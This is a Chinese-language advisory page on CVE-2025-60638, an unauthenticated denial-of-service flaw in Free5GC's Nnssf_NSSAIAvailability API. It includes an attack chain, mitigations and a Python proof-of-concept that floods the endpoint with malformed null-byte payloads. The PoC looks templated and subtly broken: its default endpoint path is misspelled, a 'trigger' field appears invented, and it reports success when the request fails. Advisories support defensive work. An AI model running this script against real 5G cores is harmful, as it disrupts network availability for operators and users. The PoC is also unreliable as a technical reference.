Free5GC Nnssf_NSSAIAvailability API拒绝服务漏洞 (CVE-2025-60638)

漏洞信息

漏洞编号

CVE-2025-60638

漏洞类型

拒绝服务

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Free5GC

漏洞概述

Free5GC是一个开源的5G核心网络（5G Core Network）实现，遵循3GPP标准规范。该漏洞影响Free5GC v4.0.0和v4.0.1版本，存在于Nnssf_NSSAIAvailability API组件中。攻击者可以通过向该API发送精心构造的POST请求，无需任何认证即可触发拒绝服务条件，导致服务不可用。由于该漏洞位于5G核心网络的关键组件中，成功的DoS攻击可能影响整个5G网络的可用性和可靠性，对运营商的网络服务质量造成严重影响。该漏洞的CVSS评分为7.5，属于高危级别，主要影响系统的可用性。

技术细节

该漏洞存在于Free5GC的Nnssf（NSSF，Network Slice Selection Function）组件中，具体是NSSAIAvailability API端点。攻击者通过发送特制的POST请求到该API，可以触发服务异常。当服务器处理恶意构造的请求时，可能导致进程崩溃或服务中断。由于该API缺乏足够的输入验证和错误处理机制，攻击者可以利用这一点造成拒绝服务。漏洞利用无需认证，攻击者只需能够访问目标服务器的Nnssf服务端口即可发起攻击。攻击成功后，5G核心网络的切片选择功能将受到影响，可能导致用户设备无法正常接入网络或切换网络切片。

攻击链分析

STEP 1

步骤1

攻击者识别目标Free5GC服务器及其Nnssf_NSSAIAvailability API端点

STEP 2

步骤2

构造包含畸形数据的POST请求，payload包含超长字符串或特殊字符

STEP 3

步骤3

发送恶意请求到Nnssf_NSSAIAvailability API，无需任何认证

STEP 4

步骤4

目标服务器处理恶意请求时触发异常，导致进程崩溃或服务中断

STEP 5

步骤5

5G核心网络的切片选择功能（NSSF）不可用，造成拒绝服务

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-60638 PoC - Free5GC Nnssf_NSSAIAvailability DoS
# Target: Free5GC v4.0.0 / v4.0.1

def exploit(target_url):
    """
    Exploit for CVE-2025-60638
    Free5GC Nnssf_NSSAIAvailability API DoS vulnerability
    """
    # Crafted POST request to trigger DoS
    payload = {
        "nssaiAvailabilityData": [
            {
                "supportedSnssaiList": [
                    {
                        "sst": "\x00" * 100,
                        "sd": "\xff" * 50
                    }
                ]
            }
        ],
        "trigger": "malformed_input"
    }
    
    headers = {
        'Content-Type': 'application/json',
        'Accept': 'application/json'
    }
    
    try:
        print(f"[*] Sending crafted request to {target_url}")
        response = requests.post(
            target_url,
            json=payload,
            headers=headers,
            timeout=10
        )
        print(f"[*] Response status: {response.status_code}")
        
        # Alternative payload with invalid JSON structure
        alt_payload = {"invalid": "\x00\x01\x02" * 50}
        response2 = requests.post(
            target_url,
            json=alt_payload,
            headers=headers,
            timeout=10
        )
        print(f"[*] Alternative payload sent")
        
    except requests.exceptions.RequestException as e:
        print(f"[+] Exploit sent successfully - Target may be affected")
        print(f"[*] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) < 2:
        target = "http://localhost:8000/nnssf-nsseaiavailability/v1/nssai-availability"
    else:
        target = sys.argv[1]
    
    exploit(target)

影响范围

Free5GC v4.0.0

Free5GC v4.0.1

防御指南

临时缓解措施

在防火墙层面限制对Nnssf服务的访问，仅允许可信来源IP访问；启用请求超时和连接限制；监控异常请求模式并设置告警。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-60638
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-60638
3 Details https://www.cvedetails.com/cve/CVE-2025-60638/
4 VulDB https://vuldb.com/cve/CVE-2025-60638
5 Link https://github.com/free5gc/free5gc
6 Link https://github.com/free5gc/free5gc/issues/704